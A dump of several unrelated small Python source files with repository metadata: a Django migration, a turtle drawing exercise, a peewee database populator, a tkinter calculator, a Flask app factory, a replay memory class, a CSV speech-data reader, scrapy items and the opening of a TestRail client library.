writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
#turn the filter back on and set the sample rate back to 200 Hz
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
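# The bias-step blocks above repeat one pattern at step sizes of 0.1, 0.025 and
# 0.01 (each divided by the high/low current ratio). A hedged helper capturing
# that pattern (my refactor sketch, not part of the original run):
def take_bias_step(S, bias_array, step_size, n_steps=2, dwell=2):
    """Square-wave the TES bias by step_size and return the stream file path."""
    dat_path = S.stream_data_on()
    for _ in range(n_steps):
        S.set_tes_bias_bipolar_array(bias_array)
        time.sleep(dwell)
        S.set_tes_bias_bipolar_array(bias_array - step_size)
        time.sleep(dwell)
    S.stream_data_off()
    return dat_path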
|
[
"jlashner@gmail.com"
] |
jlashner@gmail.com
|
8d53e43ebb62761b82dede6505a974d381b4e938
|
28c0bcb13917a277cc6c8f0a34e3bb40e992d9d4
|
/koku/reporting/migrations/0109_remove_ocpusagelineitemdailysummary_pod.py
|
7fc341bdb4450847e431947e91154a91e5a14a73
|
[
"Apache-2.0"
] |
permissive
|
luisfdez/koku
|
43a765f6ba96c2d3b2deda345573e1d97992e22f
|
2979f03fbdd1c20c3abc365a963a1282b426f321
|
refs/heads/main
| 2023-06-22T13:19:34.119984
| 2021-07-20T12:01:35
| 2021-07-20T12:01:35
| 387,807,027
| 0
| 1
|
Apache-2.0
| 2021-07-20T13:50:15
| 2021-07-20T13:50:14
| null |
UTF-8
|
Python
| false
| false
| 284
|
py
|
# Generated by Django 2.2.11 on 2020-03-27 19:21
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("reporting", "0108_auto_20200405_1316")]
operations = [migrations.RemoveField(model_name="ocpusagelineitemdailysummary", name="pod")]
|
[
"noreply@github.com"
] |
noreply@github.com
|
99c123ed63d511ca7431bbe87e9525eb6e64f04c
|
cdae61c9f016b25ace173bca720d85cd06183aee
|
/1_division.py
|
a533f9b1f9ab2441d5a07e943b404844dd2d3c93
|
[] |
no_license
|
OzLievano/Udacity-Python
|
2324cbae9f86e683edd03ccd6d09d71cf1d08168
|
fbadfc730061bf58e69ea4691f39f3d6a56d3b7c
|
refs/heads/master
| 2020-05-16T09:11:55.043076
| 2019-06-17T23:14:32
| 2019-06-17T23:14:32
| 182,939,508
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
import turtle
# Set the number of sides here.
sides = 8
# Set the length of a side here.
length = 80
t = turtle.Turtle()
t.color("orange")
t.back(50)
for side in range(sides):
t.forward(length)
t.right(360/sides)
# 360/sides on the line above is the exterior
# angle of a regular polygon, so the turtle
# closes the shape after 'sides' turns.
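# The loop above generalizes to any regular polygon; a hedged helper
# sketch (my addition, not in the original exercise):
def draw_polygon(t, sides, length):
    for _ in range(sides):
        t.forward(length)
        t.right(360 / sides)  # turn by the exterior angle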
|
[
"Osvaldoalievano@gmail.com"
] |
Osvaldoalievano@gmail.com
|
8b5b8434e2c65cd3680aac20613bb183dde65c4b
|
422dd5d3c48a608b093cbfa92085e95a105a5752
|
/students/rob_sanchez/lesson_07/Department/populate_db.py
|
0d9881181095d243040fe9cb9f12c04cbe6a2320
|
[] |
no_license
|
UWPCE-PythonCert-ClassRepos/SP_Online_Course2_2018
|
a2052fdecd187d7dd6dbe6f1387b4f7341623e93
|
b1fea0309b3495b3e1dc167d7029bc9e4b6f00f1
|
refs/heads/master
| 2021-06-07T09:06:21.100330
| 2019-11-08T23:42:42
| 2019-11-08T23:42:42
| 130,731,872
| 4
| 70
| null | 2021-06-01T22:29:19
| 2018-04-23T17:24:22
|
Python
|
UTF-8
|
Python
| false
| false
| 6,729
|
py
|
#!/usr/bin/env python3
"""
Learning persistence with Peewee and sqlite
delete the database to start over
(but running this program does not require it)
"""
import logging
from create_personjob import *
import pprint
from datetime import datetime
def populate_person_data():
"""
add person data to database
"""
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
database = SqliteDatabase('personjob.db')
logger.info('Working with Person class')
PERSON_NAME = 0
LIVES_IN_TOWN = 1
NICKNAME = 2
people = [
('Andrew', 'Sumner', 'Andy'),
('Peter', 'Seattle', None),
('Susan', 'Boston', 'Beannie'),
('Pam', 'Coventry', 'PJ'),
('Steven', 'Colchester', None)
]
logger.info('Creating Person records: iterate through the list of tuples')
try:
database.connect()
database.execute_sql('PRAGMA foreign_keys = ON;')
for person in people:
with database.transaction():
new_person = Person.create(
person_name=person[PERSON_NAME],
lives_in_town=person[LIVES_IN_TOWN],
nickname=person[NICKNAME])
new_person.save()
logger.info('Database add successful')
logger.info('Print the Person records we saved...')
for saved_person in Person:
logger.info(f'{saved_person.person_name} lives in {saved_person.lives_in_town} ' +
f'and likes to be known as {saved_person.nickname}')
except Exception as e:
logger.info(f'Error creating = {person[PERSON_NAME]}')
logger.info(e)
logger.info('See how the database protects our data')
finally:
logger.info('database closes')
database.close()
def populate_department_data():
"""
add department data to database
"""
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
database = SqliteDatabase('personjob.db')
logger.info('Working with Department class')
logger.info('Creating Department records')
DPT_NUMBER = 0
DPT_NAME = 1
DPT_MANAGER = 2
departments = [
('F001', 'Finance', 'Dominic Magee'),
('BU00', 'Business Operations', 'Tamara Burns'),
('BU05', 'Senior Business Analyst', 'Elvin Ryce'),
('AD01', 'Administration', 'Tiana Colby'),
('MG01', 'Management', 'Scott Huston')
]
try:
database.connect()
database.execute_sql('PRAGMA foreign_keys = ON;')
for dpt in departments:
with database.transaction():
new_dpt = Department.create(
dpt_number=dpt[DPT_NUMBER],
dpt_name=dpt[DPT_NAME],
dpt_manager=dpt[DPT_MANAGER])
new_dpt.save()
logger.info('Read and print all Department rows')
for dpt in Department:
logger.info(f'dpt number: {dpt.dpt_number} ' +
f'dpt name: {dpt.dpt_name} ' +
f'dpt manager: {dpt.dpt_manager}')
except Exception as e:
logger.info(f'Error creating = {dpt[DPT_NUMBER]}')
logger.info(e)
finally:
logger.info('database closes')
database.close()
def populate_job_data():
"""
add job data to database
"""
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
database = SqliteDatabase('personjob.db')
logger.info('Working with the Job class')
JOB_NAME = 0
START_DATE = 1
END_DATE = 2
SALARY = 3
PERSON_EMPLOYED = 4
DPT_NUMBER = 5
jobs = [
('Analyst', '2001-09-22', '2003-01-30', 65500, 'Andrew', 'F001'),
('Senior analyst', '2003-02-01', '2006-10-22', 70000, 'Andrew', 'BU00'),
('Senior business analyst', '2006-10-23', '2016-12-24', 80000, 'Andrew', 'BU05'),
('Admin supervisor', '2012-10-01', '2014-11-10', 45900, 'Peter', 'AD01'),
('Admin manager', '2014-11-14', '2018-01-05', 45900, 'Peter', 'MG01')
]
try:
database.connect()
database.execute_sql('PRAGMA foreign_keys = ON;')
for job in jobs:
with database.transaction():
new_job = Job.create(
job_name=job[JOB_NAME],
start_date=job[START_DATE],
end_date=job[END_DATE],
salary=job[SALARY],
person_employed=job[PERSON_EMPLOYED],
departmnet=job[DPT_NUMBER])
new_job.save()
logger.info('Reading and printing all Job rows (note the value of person)...')
for job in Job:
logger.info(f'{job.job_name} : {job.start_date} ' +
f'to {job.end_date} for {job.person_employed} ' +
f'dept_id: {job.departmnet}')
except Exception as e:
logger.info(f'Error creating = {job[JOB_NAME]}')
logger.info(e)
finally:
logger.info('database closes')
database.close()
def select_dpt_history():
"""
Produces a list using pretty print that shows all of
the departments a person worked in for every job they ever had.
"""
database = SqliteDatabase('personjob.db')
database.connect()
database.execute_sql('PRAGMA foreign_keys = ON;')
names = Job.select(Job.person_employed).distinct()
for name in names:
print("\nEmployee name: {}".format(str(name.person_employed)))
query = (Job
.select(Person.person_name, Department.dpt_name, Department.dpt_number,
Job.start_date, Job.end_date)
.join(Person, on=(Person.person_name == Job.person_employed))
.join(Department, on=(Department.dpt_number == Job.departmnet))
.where(Person.person_name == name.person_employed)
.namedtuples())
for row in query:
days_worked = day_diff(row.end_date, row.start_date)
out = ("Department number: " + row.dpt_number,
"Department name: " + row.dpt_name,
"Start Date: " + row.start_date,
"End Date: " + row.end_date,
"Days Worked: " + str(days_worked))
pprint.pprint(out)
def day_diff(d1, d2):
date1 = datetime.strptime(d1, '%Y-%m-%d')
date2 = datetime.strptime(d2, '%Y-%m-%d')
return abs((date2 - date1).days)
if __name__ == '__main__':
populate_person_data()
populate_department_data()
populate_job_data()
select_dpt_history()
|
[
"39395936+Parzival-X@users.noreply.github.com"
] |
39395936+Parzival-X@users.noreply.github.com
|
a2f4e07c274825a0184b7b09375b857d0da36811
|
85a809b3afb3bb5a2189670b1a557d1edcbed4f1
|
/Calci.py
|
438cf68c2b76cde9e4c86b99a1268e01d733ab46
|
[] |
no_license
|
sonunikam/calci
|
9b69abaf71713f4871941d708950fa194088a2aa
|
82b0a3aff3ecc3464507de28e5038a9580066cb5
|
refs/heads/main
| 2023-01-08T09:31:21.729649
| 2020-11-14T06:19:41
| 2020-11-14T06:19:41
| 311,559,097
| 2
| 1
| null | 2020-11-11T08:47:08
| 2020-11-10T05:49:54
|
Python
|
UTF-8
|
Python
| false
| false
| 3,000
|
py
|
# calci
from tkinter import *
def click(event):
global scvalue
text=event.widget.cget("text")
if (text=='='):
if scvalue.get().isdigit():
value=int(scvalue.get())
else:
try:
value=eval(screen.get())
except Exception as e:
value="ERROR"
scvalue.set(value)
screen.update()
elif(text=='<-'):
value=scvalue.get()
scvalue.set(value[:-1])
elif(text=='C'):
scvalue.set("")
screen.update()
else:
scvalue.set(scvalue.get() + text)
screen.update()
root=Tk()
scvalue=StringVar()
scvalue.set("")
screen=Entry(root,textvariable=scvalue,font="lucida 18 bold")
screen.pack(pady=8)
f1=Frame(root,bg="grey")
b1=Button(f1,text="9",font="lucida 20 bold")
b1.bind("<Button-1>",click)
b1.pack(padx=30,pady=20,side="left")
b2=Button(f1,text="8",font="lucida 20 bold")
b2.bind("<Button-1>",click)
b2.pack(padx=30,pady=20,side="left")
b3=Button(f1,text="7",font="lucida 20 bold")
b3.bind("<Button-1>",click)
b3.pack(padx=30,pady=20,side="left")
b4=Button(f1,text="/",font="lucida 20 bold")
b4.bind("<Button-1>",click)
b4.pack(padx=30,pady=20,side="left")
f1.pack()
f2=Frame(root,bg="grey")
b1=Button(f2,text="6",font="lucida 20 bold")
b1.bind("<Button-1>",click)
b1.pack(padx=30,pady=20,side="left")
b2=Button(f2,text="5",font="lucida 20 bold")
b2.bind("<Button-1>",click)
b2.pack(padx=30,pady=20,side="left")
b3=Button(f2,text="4",font="lucida 20 bold")
b3.bind("<Button-1>",click)
b3.pack(padx=30,pady=20,side="left")
b4=Button(f2,text="*",font="lucida 20 bold")
b4.bind("<Button-1>",click)
b4.pack(padx=30,pady=20,side="left")
f2.pack()
f3=Frame(root,bg="grey")
b1=Button(f3,text="3",font="lucida 20 bold")
b1.bind("<Button-1>",click)
b1.pack(padx=30,pady=20,side="left")
b2=Button(f3,text="2",font="lucida 20 bold")
b2.bind("<Button-1>",click)
b2.pack(padx=30,pady=20,side="left")
b3=Button(f3,text="1",font="lucida 20 bold")
b3.bind("<Button-1>",click)
b3.pack(padx=30,pady=20,side="left")
b4=Button(f3,text="-",font="lucida 20 bold")
b4.bind("<Button-1>",click)
b4.pack(padx=30,pady=20,side="left")
f3.pack()
f4=Frame(root,bg="grey")
b1=Button(f4,text="C",font="lucida 20 bold")
b1.bind("<Button-1>",click)
b1.pack(padx=30,pady=20,side="left")
b2=Button(f4,text="0",font="lucida 20 bold")
b2.bind("<Button-1>",click)
b2.pack(padx=30,pady=20,side="left")
b3=Button(f4,text="=",font="lucida 20 bold")
b3.bind("<Button-1>",click)
b3.pack(padx=30,pady=20,side="left")
b4=Button(f4,text="+",font="lucida 20 bold")
b4.bind("<Button-1>",click)
b4.pack(padx=30,pady=20,side="right")
f4.pack()
f5=Frame(root,bg='grey')
b1=Button(f5,text="<-",font="lucida 20 bold")
b1.bind("<Button-1>",click)
b1.pack(padx=30,pady=20,side="left")
b2=Button(f5,text="%",font="lucida 20 bold")
b2.bind("<Button-1>",click)
b2.pack(padx=30,pady=20,side="left")
b3=Button(f5,text="(",font="lucida 20 bold")
b3.bind("<Button-1>",click)
b3.pack(padx=30,pady=20,side="left")
b4=Button(f5,text=")",font="lucida 20 bold")
b4.bind("<Button-1>",click)
b4.pack(padx=30,pady=20,side="left")
f5.pack()
root.mainloop()
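# Note: eval() on raw Entry text will execute arbitrary Python. A hedged
# hardening sketch (my addition, not wired into click() above): allow only
# plain calculator characters before evaluating.
import re
def safe_eval(expr):
    # reject anything outside digits, operators, parentheses, dot and space
    if not re.fullmatch(r"[0-9+\-*/%(). ]+", expr):
        return "ERROR"
    try:
        return eval(expr)
    except Exception:
        return "ERROR"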
|
[
"noreply@github.com"
] |
noreply@github.com
|
dfd8d0e996b2f8152eddcccd4b7cd502b51f7d2e
|
8defe82f4195901bc72b88acd544bebdce5ab3ba
|
/Documents/Baby-Sitter/app/__init__.py
|
97c725c82c3a0f9bfa6af6a409bab42e784c0333
|
[
"MIT"
] |
permissive
|
amtesire/Baby-Sitter-App
|
c40e140d0880c5fdfbc57040be22ba0de069cb18
|
be8f16fa0e4d5ece615a5c05ba90149ee8dd437d
|
refs/heads/master
| 2023-01-27T15:53:42.273662
| 2020-12-11T11:12:00
| 2020-12-11T11:12:00
| 319,697,783
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,196
|
py
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_uploads import UploadSet, configure_uploads, IMAGES
from flask_mail import Mail
from flask_bootstrap import Bootstrap
from flask_admin import Admin
from config import config_options
db = SQLAlchemy()
login_manager = LoginManager()
login_manager.session_protection = "strong"
login_manager.login_view = "auth.login"
photos = UploadSet("photos", IMAGES)
mail = Mail()
bootstrap = Bootstrap()
admin = Admin()
def create_app(config_name):
app = Flask(__name__)
# Creating the app configurations
app.config.from_object(config_options[config_name])
# Initializing flask extensions
db.init_app(app)
login_manager.init_app(app)
mail.init_app(app)
bootstrap.init_app(app)
admin.init_app(app)
# Registering the main app Blueprint
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
# Registering auth blueprint
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix = "/authenticate")
# Configure UploadSet
configure_uploads(app, photos)
return app
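# Hedged usage sketch (assumes config_options defines a "development" key,
# which is not shown in this file):
# app = create_app("development")
# app.run(debug=True)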
|
[
"tesiregisele@gmail.com"
] |
tesiregisele@gmail.com
|
e03a1a11ec0a72b1f933899c0e29c373b5024e0b
|
2efed10762498111ff9605bbb616aeb3855c1ed7
|
/airflow-section-7/venv3/bin/jsonschema
|
599d5d59b97ea285b084d7b9c7c429edc14e8748
|
[] |
no_license
|
IndrajeetTech2020/airflow-material
|
e05b4f02464150a20277086c6d6b0b203b741a94
|
4c6ce47eeebadb746e867ce2b1605af79f6bd858
|
refs/heads/master
| 2023-05-11T16:01:48.017050
| 2021-05-22T02:02:42
| 2021-05-22T02:02:42
| 369,693,170
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 293
|
#!/home/indrajeet/Downloads/airflow-materials/airflow-materials/airflow-section-7/venv3/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from jsonschema.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"indrajeetpradhan1998@gmail.com"
] |
indrajeetpradhan1998@gmail.com
|
|
f35fa005b2b679e759f83c8c1abaa1ee213bf401
|
5d025bc7c59b0f9f5d8b6c1577beab0375644e5f
|
/excepciones/Exception1.py
|
fd69384e9ad2d28ce30a3b5152074ffe8140cee8
|
[] |
no_license
|
miguelLopezUlloa/Python-course
|
1724dea70e9e278d114b3586bf0ae4bb5133f29f
|
de20577640b7e89418cdedaa8ce9f61a2a106783
|
refs/heads/master
| 2022-11-24T06:34:47.607845
| 2020-07-29T18:09:09
| 2020-07-29T18:09:09
| 270,719,675
| 0
| 0
| null | 2020-07-29T18:09:10
| 2020-06-08T15:26:42
|
Python
|
UTF-8
|
Python
| false
| false
| 2,548
|
py
|
from excepciones.NumberEqualsException import NumberEqualsException
class Exception1:
    def __init__(self):
        print("Exception handlers are ready")
    def mngExceptionCase1(self):
        resultado = None
        a = "10"
        b = 0
        try:
            resultado = a/b
        # except ZeroDivisionError as e --> that form would only catch division by zero, NOT the TypeError
        except Exception as e:
            print("An error occurred", e)
            print(type(e))
        print("Processing continues....")
        print("The result of the operation is:", resultado)
    def mngExceptionCase2(self):
        resultado = None
        a = int(input("Enter a number:"))
        b = int(input("Enter another number:"))
        try:
            resultado = a / b
        # except ZeroDivisionError as e --> that form would only catch division by zero, NOT the TypeError
        except ZeroDivisionError as e:
            print("An error occurred, caught by ZeroDivisionError", e)
            print(type(e))
        except TypeError as e:
            print("An error occurred, caught by TypeError", e)
            print(type(e))
        except ValueError as e:
            print("An error occurred, caught by ValueError", e)
            print(type(e))
        except Exception as e:
            print("An error occurred, caught by the general Exception handler", e)
            print(type(e))
        else:
            print("No exception was raised")
        finally:
            print("End of exception handling")
        print("Processing continues....")
        print("The result of the operation is:", resultado)
    def mngExceptionCase3(self):
        resultado = None
        try:
            a = int(input("Enter a number:"))
            b = int(input("Enter another number:"))
            if a == b:
                raise NumberEqualsException("Identical numbers detected in the values entered..")
            resultado = a/b
        # except ZeroDivisionError as e --> that form would only catch division by zero, NOT the TypeError
        except Exception as e:
            print("An error occurred.. +:", e)
            print(type(e))
        print("Processing continues....")
        print("The result of the operation is:", resultado)
    def listAllExceptions(self):
        print(dir(locals()['__builtins__']))
#print("Hello")
excpt = Exception1()
#excpt.mngExceptionCase1()
#excpt.mngExceptionCase2()
excpt.mngExceptionCase3()
print("*" *60)
#excpt.listAllExceptions()
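# NumberEqualsException is imported from excepciones.NumberEqualsException but
# its definition is not shown here; a minimal sketch of what it likely looks
# like (an assumption on my part):
# class NumberEqualsException(Exception):
#     def __init__(self, message):
#         super().__init__(message)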
|
[
"miguel.lopez@dowjones.com"
] |
miguel.lopez@dowjones.com
|
824947c3b5c7b495bbbdf88e62494e33eff4afdf
|
06f3841613e1d5ff907237975809bad70ba78c2b
|
/replayMemory.py
|
7e7258c05206bdc8186d4f3d0d1f3469bad65b85
|
[
"MIT"
] |
permissive
|
hagianga21/MaxCon_RL
|
ededf7fe9cc391ae7ae6cefed7e1af4692e4bdf4
|
60f24eb74673998de3a37db251f4222ee33ba1c4
|
refs/heads/main
| 2023-03-21T21:51:18.150915
| 2021-03-21T07:00:59
| 2021-03-21T07:00:59
| 349,752,023
| 9
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 682
|
py
|
from collections import namedtuple
import random
Transition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward'))
class ReplayMemory(object):
def __init__(self, capacity):
self.capacity = capacity
self.memory = []
self.position = 0
def push(self, *args):
"""Saves a transition."""
if len(self.memory) < self.capacity:
self.memory.append(None)
self.memory[self.position] = Transition(*args)
self.position = (self.position + 1) % self.capacity
def sample(self, batch_size):
return random.sample(self.memory, batch_size)
def __len__(self):
return len(self.memory)
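# Minimal usage sketch (the transition values below are placeholders, not
# taken from an actual training loop):
if __name__ == "__main__":
    memory = ReplayMemory(capacity=4)
    for step in range(6):  # overfill the buffer to show the wrap-around
        memory.push(step, step % 2, step + 1, 1.0)
    print(len(memory))       # 4 -- capacity is enforced by the modulo position
    print(memory.sample(2))  # two random Transition namedtuples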
|
[
"hagianga21@gmail.com"
] |
hagianga21@gmail.com
|
e68c7430674468cf9214f7d81eba5c79ff1247f5
|
2b89acad6d77f9f6c7dcd7f77c3a5b17e503441a
|
/Server/app/conf/__init__.py
|
6eedbbab73b0c5531f79d47d92acbf2b96e9b2d1
|
[] |
no_license
|
Harriet92/2ndHandBookshop
|
665aa874024f30e1e8775dc0a5c8ca525eae4c6f
|
e591e4cc41afd6e18e6f98544ac83af7e887b6d7
|
refs/heads/master
| 2020-04-10T15:56:02.433447
| 2015-05-28T04:09:09
| 2015-05-28T04:09:09
| 32,283,339
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 191
|
py
|
import os
config = None
if 'DYNO' in os.environ:
from .production import ProductionConfig
config = ProductionConfig
else:
    from .local import LocalConfig
config = LocalConfig
|
[
"jakub.skalecki@gmail.com"
] |
jakub.skalecki@gmail.com
|
fa9595421ba7e822be4602f3069f21c36cc63d8c
|
5192d92243ef24033c0a168e3856576aff33a41a
|
/CTRL/views.py
|
86967a79752cc5f3041fb291615f9191d8ffe4b7
|
[] |
no_license
|
drkessler91/CTRL_SHIFT
|
2649aea92ce54bbe8ab6915325d57c089e7a4910
|
72f828d7f3d0276006fbb4f8f13adc94a7dcb195
|
refs/heads/main
| 2023-06-22T02:33:31.934691
| 2023-06-14T11:53:01
| 2023-06-14T11:53:01
| 320,360,412
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,380
|
py
|
from django.shortcuts import render, HttpResponse, redirect
from CTRL_SHIFT import CtrlShift
from CTRL.InputForm import InputForm
# Create your views here.
def login(request):
context = {}
context['form'] = InputForm()
return render(request, 'login_page.html', context)
employees_name = CtrlShift.name_for_employee_in_shift
employees_shifts = CtrlShift.fillEmp()
print(employees_shifts)
def shift(request):
print('Worker Number')
if request.method == 'POST':
emp_id = request.POST.get('uname')
print(emp_id)
        for key in employees_shifts:
            if key.get(int(emp_id)):
                print(key)
                for key_name in employees_name:
                    if key_name[2] == int(emp_id):
                        emp = key[int(emp_id)]
                        emp['first_name'] = key_name[0]
                        emp['last_name'] = key_name[1]
                        print('emp')
                        print(emp)
        return render(request, 'shift_page.html', {'emp': emp})
"""
class CtrlConfig(AppConfig):
name = "CTRL"
"""
|
[
"50701121+drkessler91@users.noreply.github.com"
] |
50701121+drkessler91@users.noreply.github.com
|
ef3e92d292f57491fdb6d13b199c0e64f878aebd
|
c4d660850a0043dacaa3b19f5619bd21f9c78018
|
/CSVReader.py
|
ce788dbfd994f25436623386be410b122840cb9a
|
[] |
no_license
|
tungminh111/speech_processing
|
d6ebb154e251085afce8a8d1d69b9b197f2388b4
|
c5d7ab95d4bc78dcd309f6ef4f72c9a726e457d7
|
refs/heads/master
| 2021-04-23T02:24:06.510294
| 2020-05-10T09:02:47
| 2020-05-10T09:02:47
| 249,889,894
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,623
|
py
|
import csv
import os
import re
class CSVReader:
def __init__(self):
self.reader = None
self.dir_path = os.path.dirname(os.path.realpath(__file__))
self.mssv = []
dirname = os.path.join(self.dir_path, 'assignment1')
for subdirname in os.listdir(dirname):
if subdirname[:8] not in self.mssv:
self.mssv.append(subdirname[:8])
        self.output_path = os.path.join(self.dir_path, "output_data")
def recordWord(self, s):
        output_path = os.path.join(self.output_path, s)
output_path = os.path.join(output_path, s + ".txt")
wf = open(output_path, 'w', encoding='utf-8')
orgS = s
s = s.lower()
        s = re.split(' +', s)  # ' +' splits on runs of spaces; ' *' also matches empty strings
c = 0
with open('text-data.csv', mode='r', encoding='utf-8') as csv_file:
csv_reader = csv.DictReader(csv_file)
for row in csv_reader:
if row['Mã SV'] not in self.mssv:
continue
dirname = os.path.join(self.dir_path, 'assignment1')
for subdirname in os.listdir(dirname):
if not os.path.isdir(os.path.join(dirname, subdirname)):
continue
if subdirname[:8] == row['Mã SV']:
dirname = os.path.join(dirname, subdirname)
break
for key, value in row.items():
if key != 'STT' and key != 'Mã SV' and key != 'Họ và tên':
lineList = value.split('\n')
for id in range((len(lineList) - 1) // 2):
filename = lineList[1 + id * 2]
sentence = lineList[2 + id * 2]
sentence = str(sentence).lower()
                        wordList = re.split(r'\.|,| +', sentence)
if self.match(s, wordList):
filename = self.findFile(dirname, key, filename)
if filename == 'not found':
continue
c += 1
self.writeFile(wf, filename)
wf.close()
print(c)
def match(self, s, t):
for i in range(len(t) - len(s) + 1):
cur = True
for j in range(len(s)):
if s[j] != t[i + j]:
cur = False
break
if cur:
return True
return False
def writeFile(self, wf, filename):
wf.write(os.fsdecode(filename) + "\n")
def no_accent_vietnamese(self, s):
s = re.sub(u'[àáạảãâầấậẩẫăằắặẳẵ]', 'a', s)
s = re.sub(u'[ÀÁẠẢÃĂẰẮẶẲẴÂẦẤẬẨẪ]', 'A', s)
        s = re.sub(u'[èéẹẻẽêềếệểễ]', 'e', s)
        s = re.sub(u'[ÈÉẸẺẼÊỀẾỆỂỄ]', 'E', s)
        s = re.sub(u'[òóọỏõôồốộổỗơờớợởỡ]', 'o', s)
        s = re.sub(u'[ÒÓỌỎÕÔỒỐỘỔỖƠỜỚỢỞỠ]', 'O', s)
        s = re.sub(u'[ìíịỉĩ]', 'i', s)
        s = re.sub(u'[ÌÍỊỈĨ]', 'I', s)
        s = re.sub(u'[ùúụủũưừứựửữ]', 'u', s)
        s = re.sub(u'[ƯỪỨỰỬỮÙÚỤỦŨ]', 'U', s)
        s = re.sub(u'[ỳýỵỷỹ]', 'y', s)
        s = re.sub(u'[ỲÝỴỶỸ]', 'Y', s)
s = re.sub(u'Đ', 'D', s)
s = re.sub(u'đ', 'd', s)
return s.encode('utf-8')
def findFile(self, dirpath, dirname, filename):
        dirname = re.split('-| +|_', dirname)
for i in range(len(dirname)):
dirname[i] = dirname[i].lower()
dirname[i] = self.no_accent_vietnamese(dirname[i])
for subdir, dirs, files in os.walk(dirpath):
basename = os.path.basename(subdir)
            basename = re.split('-| +|_', basename)
same = True
for i in range(len(basename)):
basename[i] = basename[i].lower()
basename[i] = self.no_accent_vietnamese(basename[i])
if len(basename) != len(dirname):
same = False
else:
for i in range(len(basename)):
if basename[i] != dirname[i]:
same = False
if not same:
continue
for file in files:
if file == filename:
return os.path.join(subdir, filename)
return 'not found'
if __name__ == '__main__':
reader = CSVReader()
reader.recordWord('')
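# Alternative accent-stripping sketch using only the standard library (my
# addition, not part of the original pipeline): NFD-decompose and drop the
# combining marks. Note that 'đ'/'Đ' do not decompose, so the explicit
# substitutions used above are still needed for Vietnamese.
import unicodedata

def strip_accents(text):
    text = text.replace('Đ', 'D').replace('đ', 'd')
    decomposed = unicodedata.normalize('NFD', text)
    return ''.join(ch for ch in decomposed if not unicodedata.combining(ch))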
|
[
"noreply@github.com"
] |
noreply@github.com
|
8d7fa55e0388af171f10bc6a0f4656f87b9dc16d
|
702be375c7cbfdd2f2d3ea23df7efddafcf74158
|
/novel_xbiquge/novel_xbiquge/items.py
|
a741402a93b0d8e287e54d064c2fbdc66f340020
|
[] |
no_license
|
Jason-wjq/novel
|
1b5b6e2e4367e8326895aed0ecd938510c95614e
|
9a1b68ce83eaa48fd61b71d95edd45832aafb97e
|
refs/heads/master
| 2020-09-15T08:36:48.128932
| 2019-11-22T13:02:33
| 2019-11-22T13:02:33
| 223,396,829
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 426
|
py
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class NovelXbiqugeItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
title = scrapy.Field()
author = scrapy.Field()
chapter = scrapy.Field()
content = scrapy.Field()
ordinal = scrapy.Field()
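# Hedged usage sketch inside a spider callback (the CSS selectors are
# illustrative placeholders, not taken from the actual xbiquge spider):
# def parse_chapter(self, response):
#     item = NovelXbiqugeItem()
#     item['title'] = response.css('h1::text').get()
#     item['content'] = ' '.join(response.css('#content::text').getall())
#     yield item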
|
[
"1391054830@qq.com"
] |
1391054830@qq.com
|
f267772e5599c4c70cc4a2c5087d55617d7fc582
|
0627fe073de8af9a63d48a15ee0b1077fd8ffd98
|
/py3/TestRailLib.py
|
1bb5041357e7936e1eca4eea520144914b157701
|
[] |
no_license
|
prabhukalaimani/Python-and-TestRail
|
d312158a59a35d0431d3180f4049f7fefbbb00b4
|
cae168eafbdcabb6af70e7c4a8c4be022309b36f
|
refs/heads/master
| 2021-10-01T14:59:08.426139
| 2018-11-27T04:21:18
| 2018-11-27T04:21:18
| 114,306,354
| 4
| 0
| null | 2018-11-27T04:21:19
| 2017-12-14T23:34:43
|
Python
|
UTF-8
|
Python
| false
| false
| 23,132
|
py
|
#!/usr/bin/python
"""
Author: Prabhu Kalaimani
Purpose:
The purpose of the library is to use the api's provided by TestRail.
This utility is developed using python 3 environment.
Note: We need the Testrail binding methods which can be downloaded from
from https://github.com/gurock/testrail-api
"""
from testrail import APIClient, APIError
import urllib.error as err
import trDefines as Defines
import logging
import logging.config
import os
class TestRailLib:
"""
This class contains methods for accessing TestRail API's.
For more information : https://www.gurock.com/testrail
"""
def __init__(self, tr_server, user_name, password):
"""
This method will initialize the TestRail server using the user name and password provided
:param tr_server: Name of the Test Rail server
:param user_name: TestRail user id
:param password: TestRail password
"""
file_dir = os.path.split(os.path.realpath(__file__))[0]
logging.config.fileConfig(os.path.join(file_dir, "trlogger.ini"))
# Configure the logger
self._log = logging.getLogger('testrail')
self._log.info("Starting TestRail application ")
# TestRail Connection status
# Note: This variable is used to ensure we have a valid TestRail Instance
self._connection_status = False
try:
# Check if the URL is valid
self._client = APIClient(tr_server)
self._client.password = password
self._client.user = user_name
self._connection_status = True
# Check if the url, user name and password is set correctly by accessing an API
self._client.send_get(Defines.TR_API_GET_PROJ + "/" + str(Defines.TR_PROJ_ID_OTG))
self._log.info("Connected to TestRail server {} with user-id {}".format(tr_server, user_name))
except err.URLError:
self._log.exception("Url: {} is not valid".format(tr_server))
raise err.URLError("Error: Please check the URL")
except APIError:
self._log.critical(
"User-id or Password is not correct. Failed to connect with TestRail url: {}".format(tr_server))
